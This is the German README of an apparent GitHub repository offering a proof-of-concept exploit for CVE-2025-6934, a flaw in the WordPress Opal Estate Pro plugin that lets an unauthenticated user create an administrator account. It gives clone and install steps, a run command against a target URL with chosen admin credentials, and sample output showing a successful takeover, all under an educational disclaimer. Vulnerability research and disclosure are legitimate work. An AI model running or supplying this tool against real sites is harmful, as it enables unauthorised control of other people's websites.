
Proof-of-Concept-Exploit für CVE-2025-6934, eine kritische Schwachstelle im WordPress Opal Estate Pro Plugin, die die Erstellung von Administratorkonten ohne Authentifizierung ermöglicht. Enthält automatische Versionserkennung, Nonce-Extraktion und Ausnutzung von AJAX-Endpunkten.
📖 Beschreibung
Dieses Repository enthält einen Proof of Concept (PoC)-Exploit für CVE-2025-6934,
eine kritische Schwachstelle im WordPress-Plugin: Opal Estate Pro <= 1.7.5, die die Erstellung von Administrator-Konten ohne Authentifizierung ermöglicht.
⚠️ Haftungsausschluss: Dieses Tool wird nur zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt.
Der Autor übernimmt keine Haftung für Missbrauch oder verursachte Schäden.
readme.txtRepository klonen und Abhängigkeiten installieren:
git clone https://github.com/yukinime/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
Führen Sie das Skript mit Ihrem Ziel aus:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ Beispielausgabe:
[✔] Exploit erfolgreich!
Username : newadmin
Email : [email protected]
Password : MySecurePass123
Role : administrator
Exploit-Screenshot
Cyberlone Indonesia (Cyberlone)
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE für Details.